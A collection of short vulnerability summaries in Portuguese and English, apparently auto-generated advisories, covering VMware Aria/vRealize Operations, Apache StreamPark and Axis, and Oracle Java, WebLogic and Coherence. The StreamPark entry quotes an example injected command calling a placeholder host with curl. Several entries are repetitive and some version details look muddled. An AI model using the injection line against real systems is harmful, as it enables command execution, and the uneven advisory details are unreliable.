Thiscodecc

Nome do software vulnerável e versões afetadas: VMware Aria Operations (versões afetadas não especificadas) Descrição: O problema está relacionado a uma vulnerabilidade de escalonamento de privilégios locais no VMware Aria Operations. Um agente mal-intencionado com privilégios administrativos locais pode explorar essa vulnerabilidade para escalar privilégios até o usuário root no dispositivo que executa o VMware Aria Operations. A vulnerabilidade está associada a erros no gerenciamento de privilégios. Recomendações: No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.

Nome do software vulnerável e versões afetadas: VMware Aria Operations (versões afetadas não especificadas) Descrição: O problema está relacionado a erros na gestão de privilégios na ferramenta VMware Aria Operations, que podem ser explorados para escalar privilégios. Um agente mal-intencionado com privilégios administrativos locais pode inserir comandos maliciosos no arquivo de propriedades para obter acesso de usuário root no dispositivo que executa o VMware Aria Operations. Recomendações: No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Versões do streampark-console anteriores à 2.1.4 **Descrição** O problema decorre da falta de validação do campo de classificação enviado do front-end para o back-end, que é utilizado para gerar consultas SQL. Isso representa um risco de injeção de SQL, podendo levar ao vazamento de dados. Um invasor precisa primeiro fazer login com sucesso no sistema para explorar essa vulnerabilidade. O impacto é considerado baixo, uma vez que não é possível gravar dados por meio dessa vulnerabilidade. **Recomendações** Para versões anteriores à 2.1.4, atualize para a versão 2.1.4 para bloquear tais parâmetros e mitigar o risco.

**Nome do software vulnerável e versões afetadas** VMware Aria Operations (versões afetadas não especificadas) **Descrição** O problema está relacionado a uma escalada de privilégios local, na qual um agente mal-intencionado com acesso administrativo ao sistema local pode escalar privilégios para “root”. Isso se deve a um controle de acesso insuficiente na ferramenta de monitoramento da infraestrutura virtual. **Recomendações** No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Versões do Apache Axis até a 1.3 **Descrição** O problema está relacionado a uma vulnerabilidade de validação inadequada de entrada no Apache Axis, que permite que usuários com acesso ao serviço de administração realizem possíveis ataques de falsificação de solicitação do lado do servidor (SSRF). Isso poderia levar a um acesso não autorizado a recursos internos. O número estimado de dispositivos potencialmente afetados em todo o mundo não foi especificado. Não há informações sobre incidentes reais em que essa vulnerabilidade tenha sido explorada. **Recomendações** Como solução temporária, considere migrar para um mecanismo SOAP diferente, como o Apache Axis 2/Java. Como alternativa, use uma versão do Axis com o patch de https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 aplicado. Observe que o projeto Apache Axis não planeja lançar uma versão do Axis 1.x para corrigir este problema.

**Name of the Vulnerable Software and Affected Versions** Apache StreamPark versions prior to 2.1.4 **Description** The issue is related to incorrect handling of the `<` element in the Project Module of Apache StreamPark, allowing for remote command execution. The vulnerability can be exploited by inserting commands, such as using the `<` operator to execute arbitrary commands, for example, `< (curl http://xxx.com )`. The risk level of this vulnerability is considered low, as it requires the attacker to have system-level permissions and log in to the StreamPark system. **Recommendations** For versions prior to 2.1.4, upgrade to version 2.1.4 to resolve the issue, as the `<` operator will be blocked in this version.

**Name of the Vulnerable Software and Affected Versions** Oracle Java SE versions 8u381 through 8u381-perf Oracle GraalVM Enterprise Edition versions 20.3.11 through 21.3.7 **Description** The vulnerability in the Oracle Java SE and Oracle GraalVM Enterprise Edition product is related to the CORBA component. It allows an unauthenticated attacker with network access via CORBA to compromise the system. Successful attacks can result in unauthorized update, insert, or delete access to some of the accessible data. This vulnerability can only be exploited by supplying data to APIs in the specified component without using untrusted Java Web Start applications or untrusted Java applets, such as through a web service. **Recommendations** For Oracle Java SE versions 8u381 through 8u381-perf, consider disabling the CORBA component until a patch is available. For Oracle GraalVM Enterprise Edition versions 20.3.11 through 21.3.7, restrict access to the CORBA component to minimize the risk of exploitation. As a temporary workaround, consider restricting the use of APIs in the specified component without using untrusted Java Web Start applications or untrusted Java applets. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** VMware Aria Operations (affected versions not specified) **Description** The issue is related to insecure privilege management in VMware Aria Operations, allowing a malicious actor with administrative access to the local system to escalate privileges to 'root'. This could enable the execution of arbitrary code with root privileges. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** VMware Aria Operations (affected versions not specified) **Description** The issue is related to a Local privilege escalation vulnerability in VMware Aria Operations. A malicious actor with administrative privileges in the Aria Operations application can gain root access to the underlying operating system. The vulnerability is also associated with insufficient access control in the virtual infrastructure monitoring tool. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** VMware Aria Operations (affected versions not specified) **Description** The issue is related to insufficient access control in the VMware Aria Operations tool, which can be exploited to execute arbitrary code and escalate privileges. A malicious actor with administrative access to the local system can escalate privileges to 'root'. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Oracle WebLogic Server versions 12.2.1.3.0 through 12.2.1.4.0 Oracle WebLogic Server version 14.1.1.0.0 **Description** The issue is related to errors in handling input data in the Core component of the Oracle WebLogic Server. It allows an unauthenticated attacker with network access via T3 to compromise the server. Successful attacks can result in unauthorized access to critical data or complete access to all accessible data on the Oracle WebLogic Server. **Recommendations** For Oracle WebLogic Server versions 12.2.1.3.0 through 12.2.1.4.0, update to a version that includes the fix for this issue. For Oracle WebLogic Server version 14.1.1.0.0, update to a version that includes the fix for this issue. As a temporary workaround, consider restricting access to the T3 protocol to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** VMware vRealize Operations (vROps) (affected versions not specified) **Description** The issue is related to insufficient authentication of executed requests in the vRealize Operations (vROps) tool, allowing a remote attacker to perform a CSRF attack. This could enable a malicious user to execute actions on the vROps platform on behalf of an authenticated victim user. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Oracle WebLogic Server versions 12.2.1.3.0 through 12.2.1.4.0 Oracle WebLogic Server version 14.1.1.0.0 **Description** The issue is related to insufficient input validation in the Core component of Oracle WebLogic Server, part of the Oracle Fusion Middleware platform. This can be exploited by a remote attacker to disclose sensitive information. Successful attacks can result in unauthorized access to critical data or complete access to all accessible data on the Oracle WebLogic Server. The vulnerability can be easily exploited by an unauthenticated attacker with network access via IIOP. **Recommendations** For Oracle WebLogic Server versions 12.2.1.3.0 and 12.2.1.4.0, update to a version that includes the fix for this issue. For Oracle WebLogic Server version 14.1.1.0.0, update to a version that includes the fix for this issue. As a temporary workaround, consider restricting network access via IIOP to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** Oracle WebLogic Server versions 12.2.1.3.0 through 12.2.1.4.0 Oracle WebLogic Server version 14.1.1.0.0 **Description** The issue is related to insufficient input validation in the Core component of Oracle WebLogic Server, allowing an unauthenticated attacker with network access via T3, IIOP to compromise the server. Successful attacks can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. It is estimated that millions of servers worldwide are affected, with 166,000 in Brazil alone. **Recommendations** For Oracle WebLogic Server versions 12.2.1.3.0 through 12.2.1.4.0, update to a version that includes the fix released by Oracle on January 24. For Oracle WebLogic Server version 14.1.1.0.0, update to a version that includes the fix released by Oracle on January 24. As a temporary workaround, consider restricting access to the T3 and IIOP protocols to minimize the risk of exploitation.

**Nome do software vulnerável e versões afetadas** vRealize Operations (vROps) (versões afetadas não especificadas) **Descrição** O problema está relacionado ao gerenciamento inadequado de privilégios no vRealize Operations, o que pode levar a uma escalada de privilégios. Isso permite que um invasor remoto possa elevar seus privilégios. **Recomendações** No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Versões do vRealize Operations (versões afetadas não especificadas) **Descrição** O problema está relacionado a uma vulnerabilidade de falha no controle de acesso na ferramenta VMware vRealize Operations, o que pode levar à divulgação de informações. Essa vulnerabilidade pode permitir que um invasor remoto divulgue informações protegidas. A gravidade desse problema é considerada moderada. **Recomendações** No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Oracle Coherence versões 3.7.1.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 **Descrição** O problema está relacionado à validação insuficiente de entradas no componente Core do Oracle Coherence, permitindo que um invasor não autenticado com acesso à rede via protocolos T3 ou IIOP comprometa o Oracle Coherence. Ataques bem-sucedidos podem resultar na capacidade não autorizada de causar um travamento ou falha repetitiva (DOS completo) do Oracle Coherence. **Recomendações** Para as versões 3.7.1.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0, considere restringir o acesso à rede via protocolos T3 e IIOP para minimizar o risco de exploração. Como solução temporária, limite a capacidade de invasores remotos de causar um travamento ou falha do Oracle Coherence implementando medidas de segurança adicionais, como segmentação de rede ou sistemas de detecção de intrusão. No momento, não há informações sobre uma versão mais recente que contenha uma correção para essa vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Oracle WebLogic Server, versões 12.2.1.4.0 a 14.1.1.0.0 **Descrição** O problema está relacionado à validação insuficiente de entradas no componente Sample apps do Oracle WebLogic Server, permitindo que um invasor não autenticado com acesso à rede via HTTP comprometa o servidor. Ataques bem-sucedidos exigem interação humana de uma pessoa que não seja o invasor e podem impactar significativamente outros produtos. Isso pode resultar em acesso não autorizado para atualização, inserção ou exclusão de alguns dos dados acessíveis do Oracle WebLogic Server, bem como acesso não autorizado para leitura de um subconjunto dos dados acessíveis do servidor. **Recomendações** Para as versões 12.2.1.4.0 e 14.1.1.0.0, atualize para uma versão que inclua a correção para este problema, pois não há solução alternativa específica disponível para essas versões. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.

**Nome do software vulnerável e versões afetadas** Oracle WebLogic Server, versões 12.1.3.0.0 a 12.2.1.4.0 Oracle WebLogic Server, versão 14.1.1.0.0 **Descrição** O problema está relacionado à validação insuficiente de entradas no componente Oracle WebLogic Server Core. Isso pode ser explorado por um invasor remoto para obter acesso não autorizado para ler, modificar ou excluir dados, ou para causar uma negação de serviço usando protocolos de rede T3. Ataques bem-sucedidos podem resultar em acesso não autorizado para atualizar, inserir ou excluir alguns dos dados acessíveis do Oracle WebLogic Server e podem causar uma negação de serviço parcial. **Recomendações** Para as versões 12.1.3.0.0 a 12.2.1.4.0 do Oracle WebLogic Server, atualize para uma versão que inclua a correção para este problema. Para a versão 14.1.1.0.0 do Oracle WebLogic Server, atualize para uma versão que inclua a correção para este problema. Como solução alternativa temporária, considere restringir o acesso ao protocolo T3 para minimizar o risco de exploração.

**Nome do software vulnerável e versões afetadas** Oracle WebLogic Server, versões 12.2.1.4.0 a 14.1.1.0.0 **Descrição** Uma vulnerabilidade no produto Oracle WebLogic Server permite que um invasor não autenticado com acesso à rede via HTTP comprometa o servidor. Ataques bem-sucedidos podem resultar em acesso não autorizado a dados críticos ou acesso total a todos os dados acessíveis. O problema está relacionado à validação insuficiente de entradas no componente Core do servidor, que pode ser explorada por um invasor usando protocolos HTTP. **Recomendações** Para as versões 12.2.1.4.0 e 14.1.1.0.0, atualize para uma versão que inclua a correção para este problema. Como solução alternativa temporária, considere restringir o acesso ao endpoint HTTP para minimizar o risco de exploração. Evite usar o componente vulnerável até que um patch esteja disponível. No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.